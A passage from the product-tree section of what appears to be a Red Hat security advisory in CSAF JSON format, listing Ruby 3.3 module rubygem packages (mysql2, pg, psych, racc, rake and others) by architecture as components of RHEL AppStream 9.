"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-minitest-0:5.20.0-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-minitest-0:5.20.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygem-minitest-0:5.20.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3"
},
"product_reference": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3"
},
"product_reference": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.src (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.src::ruby:3.3"
},
"product_reference": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3"
},
"product_reference": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3"
},
"product_reference": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3"
},
"product_reference": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3"
},
"product_reference": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3"
},
"product_reference": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3"
},
"product_reference": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3"
},
"product_reference": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-mysql2-doc-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-mysql2-doc-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3"
},
"product_reference": "rubygem-mysql2-doc-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3"
},
"product_reference": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3"
},
"product_reference": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.src (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.src::ruby:3.3"
},
"product_reference": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3"
},
"product_reference": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3"
},
"product_reference": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3"
},
"product_reference": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3"
},
"product_reference": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3"
},
"product_reference": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3"
},
"product_reference": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3"
},
"product_reference": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-pg-doc-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-pg-doc-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3"
},
"product_reference": "rubygem-pg-doc-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-power_assert-0:2.0.3-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-power_assert-0:2.0.3-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygem-power_assert-0:2.0.3-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rake-0:13.1.0-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rake-0:13.1.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygem-rake-0:13.1.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
